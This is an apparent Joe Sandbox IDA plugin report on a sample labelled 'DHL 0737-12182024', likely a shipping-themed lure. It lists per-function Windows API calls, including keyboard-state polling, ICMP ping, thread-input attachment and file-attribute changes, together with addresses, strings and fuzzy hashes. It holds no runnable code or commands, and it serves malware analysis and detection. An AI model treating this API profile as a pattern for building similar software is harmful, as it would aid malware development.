                                                                                            • Instruction ID: 8ce546ed69e5be26db3f92780dbbcd6e9e47e534ef1ce8a1860e0a1f29a2c45e
                                                                                            • Opcode Fuzzy Hash: 8cea0d588a957fbeda13759f18fc730b58e526b48c4050eba6a553385782d050
                                                                                            • Instruction Fuzzy Hash: D7C115716082059FE700DF68C88492BBBE9FF8A748F14491DF98ADB611DB31EE45CB52
                                                                                            APIs
                                                                                            • CoInitialize.OLE32(00000000), ref: 00897AF3
                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00897B8F
                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00897BA3
                                                                                            • CoCreateInstance.OLE32(008BFD08,00000000,00000001,008E6E6C,?), ref: 00897BEF
                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00897C74
                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00897CCC
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00897D57
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00897D7A
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00897D81
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00897DD6
                                                                                            • CoUninitialize.OLE32 ref: 00897DDC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 2762341140-0
                                                                                            • Opcode ID: d2acea2e0325e9ce54a4a69ea252ce717c21ee7e5402869026782bd56263b32b
                                                                                            • Instruction ID: 51cc3658653ad329d809d060a01c51aca5d623d77b00513b4788330f1b1d125e
                                                                                            • Opcode Fuzzy Hash: d2acea2e0325e9ce54a4a69ea252ce717c21ee7e5402869026782bd56263b32b
                                                                                            • Instruction Fuzzy Hash: A3C10A75A04119AFCB14DF64C884DAEBBB9FF48314B1485A9F81ADB361D730EE45CB90
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 008B5504
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008B5515
                                                                                            • CharNextW.USER32(00000158), ref: 008B5544
                                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 008B5585
                                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 008B559B
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008B55AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CharNext
                                                                                            • String ID:
                                                                                            • API String ID: 1350042424-0
                                                                                            • Opcode ID: ddbd65a8885ee3f92181f0ba6c1e000b557d6898743768a3e43f58999cc8dcea
                                                                                            • Instruction ID: 98da07cdebeda7c45bf35f36cb96587d96b33fe60454a1ac9dc3eb2e3dd23fb0
                                                                                            • Opcode Fuzzy Hash: ddbd65a8885ee3f92181f0ba6c1e000b557d6898743768a3e43f58999cc8dcea
                                                                                            • Instruction Fuzzy Hash: FE617970900609AFDF209FA4DC84EFE7BB9FB0A725F104149F925EA391D7749A80DB61
                                                                                            APIs
                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0087FAAF
                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 0087FB08
                                                                                            • VariantInit.OLEAUT32(?), ref: 0087FB1A
                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0087FB3A
                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0087FB8D
                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 0087FBA1
                                                                                            • VariantClear.OLEAUT32(?), ref: 0087FBB6
                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 0087FBC3
                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0087FBCC
                                                                                            • VariantClear.OLEAUT32(?), ref: 0087FBDE
                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0087FBE9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                            • String ID:
                                                                                            • API String ID: 2706829360-0
                                                                                            • Opcode ID: d0a7ca3901d70c25fd1bb51a757139076d76dccf69a4941985d777dc7e92c319
                                                                                            • Instruction ID: e38643a87d4e25dea4f86fc001e5f9958153b0dd861948283cbe903919786277
                                                                                            • Opcode Fuzzy Hash: d0a7ca3901d70c25fd1bb51a757139076d76dccf69a4941985d777dc7e92c319
                                                                                            • Instruction Fuzzy Hash: 01413E35A00219DFCF00DF69D8549AEBBB9FF48354F008569E959E7262CB30EA45CFA1
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?), ref: 00889CA1
                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00889D22
                                                                                            • GetKeyState.USER32(000000A0), ref: 00889D3D
                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00889D57
                                                                                            • GetKeyState.USER32(000000A1), ref: 00889D6C
                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00889D84
                                                                                            • GetKeyState.USER32(00000011), ref: 00889D96
                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00889DAE
                                                                                            • GetKeyState.USER32(00000012), ref: 00889DC0
                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00889DD8
                                                                                            • GetKeyState.USER32(0000005B), ref: 00889DEA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: State$Async$Keyboard
                                                                                            • String ID:
                                                                                            • API String ID: 541375521-0
                                                                                            • Opcode ID: 11ab7cc813602dc1eac46654e82268497ff20c5c42c1fa453859a87ded7dcac1
                                                                                            • Instruction ID: 89ff279fa4f154daf1d3208ae910b8d0e95f816b3db2537bc9aba081bd07effc
                                                                                            • Opcode Fuzzy Hash: 11ab7cc813602dc1eac46654e82268497ff20c5c42c1fa453859a87ded7dcac1
                                                                                            • Instruction Fuzzy Hash: 2141A6346047C96DFF31A664C8043B5BEE1FF11344F0C815ADAC6965C2EBE599C8C7A6
                                                                                            APIs
                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 008A05BC
                                                                                            • inet_addr.WSOCK32(?), ref: 008A061C
                                                                                            • gethostbyname.WSOCK32(?), ref: 008A0628
                                                                                            • IcmpCreateFile.IPHLPAPI ref: 008A0636
                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008A06C6
                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008A06E5
                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 008A07B9
                                                                                            • WSACleanup.WSOCK32 ref: 008A07BF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                            • String ID: Ping
                                                                                            • API String ID: 1028309954-2246546115
                                                                                            • Opcode ID: f2661834e85ef0ebebc2f2ec74b8650b6beed38119315c1ef96961eedaf42471
                                                                                            • Instruction ID: b466ee2ff8f22e0ad783c8daa6b737a6809e95fa466d66f608547093d466b8b8
                                                                                            • Opcode Fuzzy Hash: f2661834e85ef0ebebc2f2ec74b8650b6beed38119315c1ef96961eedaf42471
                                                                                            • Instruction Fuzzy Hash: 48917D355042019FE720CF19D489F1ABBE0FF45318F1485A9E46ADBAA2D731ED45CF92
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                            • API String ID: 707087890-567219261
                                                                                            • Opcode ID: d6e6235cbb8863f5a5a7d7dc22a1996af1be4e5ae1c37b6e505e66e6ea2c9717
                                                                                            • Instruction ID: 9ef97223dd5c08dbb30c9bb230973be17462f5b3857d0c15dd9713158119ac1b
                                                                                            • Opcode Fuzzy Hash: d6e6235cbb8863f5a5a7d7dc22a1996af1be4e5ae1c37b6e505e66e6ea2c9717
                                                                                            • Instruction Fuzzy Hash: 2551B131A0051ADBDF14DF6CC8409BEB7A5FF66324B214229E826E7680EF30DD50C7A0
                                                                                            APIs
                                                                                            • CoInitialize.OLE32 ref: 008A3774
                                                                                            • CoUninitialize.OLE32 ref: 008A377F
                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,008BFB78,?), ref: 008A37D9
                                                                                            • IIDFromString.OLE32(?,?), ref: 008A384C
                                                                                            • VariantInit.OLEAUT32(?), ref: 008A38E4
                                                                                            • VariantClear.OLEAUT32(?), ref: 008A3936
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: 26d07d45eb5227c656dd18ca11124f16139332813518d7e3f8b24a8f7e300884
• Instruction ID: ddc37e799ada962ba1b9208b6505fc9352ebad27ab72a25903ce650dee52eae4
• Instruction Fuzzy Hash: 7B61AE70608311AFE310DF54D888B6ABBE8FF4A714F100929F995DB691D774EE48CB92
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 008933CF
  • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008933F0
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-3080491070
• Opcode ID: 8abc87ae283b15680d6df8837a89dbdf64cc50393e5e183a849a638a841ab027
• Instruction ID: ae1639c52858b400e0903d27dae5d99f9f89b8a43ec626c79798204a59e096c7
• Instruction Fuzzy Hash: 5B51AD71800219AACF15EBA4ED56EEEB778FF14340F144065F405F2292EB356F98CB62
APIs
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 1256254125-769500911
• Opcode ID: 36d07ba0fadfe55471a08e49feda505e749fba881d129e2754591ff438958747
• Instruction ID: e77ca66f3ea3337b470ba1afa2af0d3dbea893875b00d931ca1ab04e68dd2bfd
• Instruction Fuzzy Hash: BE419332A001279BCB20BE7D89905BE7BA5FFF17A4B254229E561D7284F731CD81C790
APIs
• SetErrorMode.KERNEL32(00000001), ref: 008953A0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00895416
• GetLastError.KERNEL32 ref: 00895420
• SetErrorMode.KERNEL32(00000000,READY), ref: 008954A7
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 900f716dddb7cf12674022df5d54a4e110052d471d1671d4983abce7a75d3d43
• Instruction ID: 1412118e9cd2e416e6a7782e503ccb386366362bb794d949c4406d87802d5827
• Instruction Fuzzy Hash: FD31D4B5A006089FCB52EF69C884AAABBB4FF45305F188065F505DB292E731DD86CB91
APIs
• CreateMenu.USER32 ref: 008B3C79
• SetMenu.USER32(?,00000000), ref: 008B3C88
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008B3D10
• IsMenu.USER32(?), ref: 008B3D24
• CreatePopupMenu.USER32 ref: 008B3D2E
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008B3D5B
• DrawMenuBar.USER32 ref: 008B3D63
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0$F
• API String ID: 161812096-3044882817
• Opcode ID: fa8b97bb578f6f5c0223b19f265bf3375f1230400307ea83f409c061426a297a
• Instruction ID: 2aa073d1b16793bbb9b886fd88ec29bd27db1af38637f2c73be483fef9108070
• Instruction Fuzzy Hash: 97413A75A01209EFDB24CF64D854EEA7BB5FF49350F180129F946E7360D771AA10CB94
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008B3A9D
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008B3AA0
• GetWindowLongW.USER32(?,000000F0), ref: 008B3AC7
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008B3AEA
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008B3B62
• SendMessageW.USER32(?,00001074,00000000,00000007), ref: 008B3BAC
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 008B3BC7
• SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 008B3BE2
• SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 008B3BF6
• SendMessageW.USER32(?,00001008,00000000,00000007), ref: 008B3C13
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: f88f7599315452405055fec4c13e17a186312eeaebcec06bcf34c4ff881029a7
• Instruction ID: 4436176f4ee81378005c51b72af9014a1bc8daaaab1df2d7cf740b062f856451
• Instruction Fuzzy Hash: 2E616875A00248AFDB11DFA8CC85EEE7BB8FB09714F100199FA15E73A1C770AA45DB60
APIs
• GetCurrentThreadId.KERNEL32 ref: 0088B151
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B165
• GetWindowThreadProcessId.USER32(00000000), ref: 0088B16C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B17B
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0088B18D
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B1A6
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B1B8
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B1FD
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B212
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0088A1E1,?,00000001), ref: 0088B21D
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 2a9ee2ab1ef24417a2ab0242d503bf517ff2725f954bee43b35486a5f759e0b1
• Instruction ID: ee1334af5a4d2abdfc237458df466b0c7c10682ad40eb8c0f97d21347c173583
• Instruction Fuzzy Hash: E43168B5540604BFDB10AF64DC88FBE7BA9FBA1311F10411AFA05DA1A0DBB4AE40CF64
APIs
• _free.LIBCMT ref: 00852C94
  • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
  • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
• _free.LIBCMT ref: 00852CA0
• _free.LIBCMT ref: 00852CAB
• _free.LIBCMT ref: 00852CB6
• _free.LIBCMT ref: 00852CC1
• _free.LIBCMT ref: 00852CCC
• _free.LIBCMT ref: 00852CD7
• _free.LIBCMT ref: 00852CE2
• _free.LIBCMT ref: 00852CED
• _free.LIBCMT ref: 00852CFB
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 3f79551e3c01a5dd23cdf30e0b33eb3629f49d38d64ec70c9d60344b1565739e
• Instruction ID: d14d0e2a5c9d1c065a4d243c3c0a8256df27e2bcf3a1b7c730fc85edf72aa1ec
• Instruction Fuzzy Hash: E8119676100108AFCB02EF58D882DDD3FA5FF06351F5144A5FE48AB322DA31EE549B92
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00821459
• OleUninitialize.OLE32(?,00000000), ref: 008214F8
• UnregisterHotKey.USER32(?), ref: 008216DD
• DestroyWindow.USER32(?), ref: 008624B9
• FreeLibrary.KERNEL32(?), ref: 0086251E
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 0086254B
                                                                                            Similarity
                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                            • String ID: close all
                                                                                            • API String ID: 469580280-3243417748
                                                                                            • Opcode ID: 03942c3720e9afd95e5096c11e99a6cf50e240124977b324587bfe9251f2176e
                                                                                            • Instruction ID: 04779fb5bd27c85556a9623cc4f5246788d3f85f060180c9b869ad535e49d5c2
                                                                                            • Opcode Fuzzy Hash: 03942c3720e9afd95e5096c11e99a6cf50e240124977b324587bfe9251f2176e
                                                                                            • Instruction Fuzzy Hash: 47D18E31701222CFDB29EF18D499A29F7A0FF55710F2542ADE54AEB252DB30AC52CF91
APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00897FAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00897FC1
• GetFileAttributesW.KERNEL32(?), ref: 00897FEB
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00898005
• SetCurrentDirectoryW.KERNEL32(?), ref: 00898017
• SetCurrentDirectoryW.KERNEL32(?), ref: 00898060
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008980B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
• Opcode ID: 5addea4aa4f7a07939282ded2054bee0ecb86bebab29072a3228293993fc0565
• Instruction ID: a2da5bc438678d74c323d56b43e678a88befcb3d97a4ed49056c5b99e4ef419a
• Opcode Fuzzy Hash: 5addea4aa4f7a07939282ded2054bee0ecb86bebab29072a3228293993fc0565
• Instruction Fuzzy Hash: F081AF725182459BCF20FF18C8449AEB3E8FF89714F58486EF885D7250EB34DD498B92
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00825C7A
  • Part of subcall function 00825D0A: GetClientRect.USER32(?,?), ref: 00825D30
  • Part of subcall function 00825D0A: GetWindowRect.USER32(?,?), ref: 00825D71
  • Part of subcall function 00825D0A: ScreenToClient.USER32(?,?), ref: 00825D99
• GetDC.USER32 ref: 008646F5
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00864708
• SelectObject.GDI32(00000000,00000000), ref: 00864716
• SelectObject.GDI32(00000000,00000000), ref: 0086472B
• ReleaseDC.USER32(?,00000000), ref: 00864733
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008647C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 86a4ad31ab4b232605b9e40d9506c84b0c49d2ba48b087dc7cd7c83f44cf3bf9
• Instruction ID: 7a1ead3a28412cbd19007a1494b84362b50f58dbc7731fd958ea551b1c2c6a17
• Opcode Fuzzy Hash: 86a4ad31ab4b232605b9e40d9506c84b0c49d2ba48b087dc7cd7c83f44cf3bf9
• Instruction Fuzzy Hash: 9871FF30500209DFCF218F68C984ABE3BB6FF5A364F255269ED51DA2A6D7309881DF60
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 008935E4
  • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
• LoadStringW.USER32(008F2390,?,00000FFF,?), ref: 0089360A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-2391861430
• Opcode ID: 3ee46a5a80fb3e4a6a324e922bce68947035fdd022aab59684d958c3bad94579
• Instruction ID: 0af09cfe069d2e2c79d40a9415b25c9d4d83116fe5bc45b2ed9d7cb3681a13ad
• Opcode Fuzzy Hash: 3ee46a5a80fb3e4a6a324e922bce68947035fdd022aab59684d958c3bad94579
• Instruction Fuzzy Hash: D3516E71800219BBCF15EBA4EC56EEEBB78FF14344F184125F515B2192EB341B98DB62
APIs
  • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
  • Part of subcall function 0083912D: GetCursorPos.USER32(?), ref: 00839141
  • Part of subcall function 0083912D: ScreenToClient.USER32(00000000,?), ref: 0083915E
  • Part of subcall function 0083912D: GetAsyncKeyState.USER32(00000001), ref: 00839183
  • Part of subcall function 0083912D: GetAsyncKeyState.USER32(00000002), ref: 0083919D
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 008B8B6B
• ImageList_EndDrag.COMCTL32 ref: 008B8B71
• ReleaseCapture.USER32 ref: 008B8B77
• SetWindowTextW.USER32(?,00000000), ref: 008B8C12
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 008B8C25
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 008B8CFF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
• Opcode ID: 83fc71c9605e44eb074bbdc43b93b94133c64268e28e5c67e7685f0b016699c6
